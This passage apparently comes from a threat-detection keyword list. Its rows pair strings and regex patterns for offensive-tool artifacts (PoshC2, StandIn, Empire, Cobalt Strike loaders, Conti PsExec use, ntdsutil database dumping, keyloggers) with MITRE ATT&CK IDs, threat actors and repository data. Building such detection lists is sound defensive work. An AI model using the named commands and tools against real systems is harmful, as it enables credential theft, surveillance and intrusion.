Admins*",".{0,1000}standin\s\-\-group\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --object *",".{0,1000}standin\s\-\-object\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --spn*",".{0,1000}standin\s\-\-spn.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*StandIn.exe --*",".{0,1000}StandIn\.exe\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*StandIn.exe"" --*",".{0,1000}StandIn\.exe\""\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*StandIn_v12_Net35_45.zip*",".{0,1000}StandIn_v12_Net35_45\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*StandIn_v13_Net35_45.zip*",".{0,1000}StandIn_v13_Net35_45\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*Stardust.Win32.NtProtectVirtualMemory(*",".{0,1000}Stardust\.Win32\.NtProtectVirtualMemory\(.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*Stardust.Win32.RtlAllocateHeap(*",".{0,1000}Stardust\.Win32\.RtlAllocateHeap\(.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*STARDUST_MACROS_H*",".{0,1000}STARDUST_MACROS_H.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*stardust50578/rdp_brute*",".{0,1000}stardust50578\/rdp_brute.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*StarFighters*",".{0,1000}StarFighters.{0,1000}","offensive_tool_keyword","StarFighters","A JavaScript and VBScript Based Empire Launcher - by Cn33liz 2017","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/StarFighters","1","0","N/A","N/A","4","320","66","2017-06-05T19:18:38Z","2017-06-05T18:28:22Z" "*Staring Nemesis Bot. Teamserver*",".{0,1000}Staring\sNemesis\sBot\.\sTeamserver.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*StarkillerSnackbar.vue*",".{0,1000}StarkillerSnackbar\.vue.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" "*staroffice2john.py*",".{0,1000}staroffice2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Start Menu\Programs\Startup\Loader.exe*",".{0,1000}Start\sMenu\\Programs\\Startup\\Loader\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*start PsExec.exe -d *",".{0,1000}start\sPsExec\.exe\s\-d\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*start stinger ",".{0,1000}start\sstinger\s","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*Start the Tor2web proxy*",".{0,1000}Start\sthe\sTor2web\sproxy.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*'start/stop iptables port reuse'*",".{0,1000}\'start\/stop\siptables\sport\sreuse\'.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*start_mythic_server.sh*",".{0,1000}start_mythic_server\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*start_nbnsspoof*",".{0,1000}start_nbnsspoof.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Start-ACLsAnalysis -Domain*",".{0,1000}Start\-ACLsAnalysis\s\-Domain.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*startanotherimplant*",".{0,1000}startanotherimplant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Start-CaptureServer.ps1*",".{0,1000}Start\-CaptureServer\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Start-CaptureServer.ps1*",".{0,1000}Start\-CaptureServer\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*startdaisy*",".{0,1000}startdaisy.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Start-domainACLsAnalysis*",".{0,1000}Start\-domainACLsAnalysis.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Starting bruteforce attack on *",".{0,1000}Starting\sbruteforce\sattack\son\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*Starting CcmExec service. Wait around 30 seconds for SCNotification.exe to run config file*",".{0,1000}Starting\sCcmExec\sservice\.\sWait\saround\s30\sseconds\sfor\sSCNotification\.exe\sto\srun\sconfig\sfile.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*Starting enumerating file shares using domain credential for *",".{0,1000}Starting\senumerating\sfile\sshares\susing\sdomain\scredential\sfor\s.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*Starting HVNC Server*",".{0,1000}Starting\sHVNC\sServer.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*Starting keylogger for *",".{0,1000}Starting\skeylogger\sfor\s.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*starting Multi-Layered ACLight scan*",".{0,1000}starting\sMulti\-Layered\sACLight\sscan.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Starting php server at localhost:*",".{0,1000}Starting\sphp\sserver\sat\slocalhost\:.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*Starting PoolParty attack against process id: *",".{0,1000}Starting\sPoolParty\sattack\sagainst\sprocess\sid\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*Starting PoolParty attack against process id:*",".{0,1000}Starting\sPoolParty\sattack\sagainst\sprocess\sid\:.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*Starting port scan for *",".{0,1000}Starting\sport\sscan\sfor\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*starting RevSocksServer: *",".{0,1000}starting\sRevSocksServer\:\s.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*Starting share enumeration against * hosts*",".{0,1000}Starting\sshare\senumeration\sagainst\s.{0,1000}\shosts.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*Starting socks server * tunnel at *",".{0,1000}Starting\ssocks\sserver\s.{0,1000}\stunnel\sat\s.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*Starting tor (via systemctl)*",".{0,1000}Starting\stor\s\(via\ssystemctl\).{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*Starting wstunnel server v*",".{0,1000}Starting\swstunnel\sserver\sv.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*-start-keylogger*",".{0,1000}\-start\-keylogger.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*start-keystrokes*",".{0,1000}start\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*start-keystrokes-writefile*",".{0,1000}start\-keystrokes\-writefile.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Start-MonitorTCPConnections.ps1*",".{0,1000}Start\-MonitorTCPConnections\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*start-process ntdsutil.exe *create full**",".{0,1000}start\-process\sntdsutil\.exe\s.{0,1000}create\sfull.{0,1000}.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*StartProcessFake(*",".{0,1000}StartProcessFake\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" 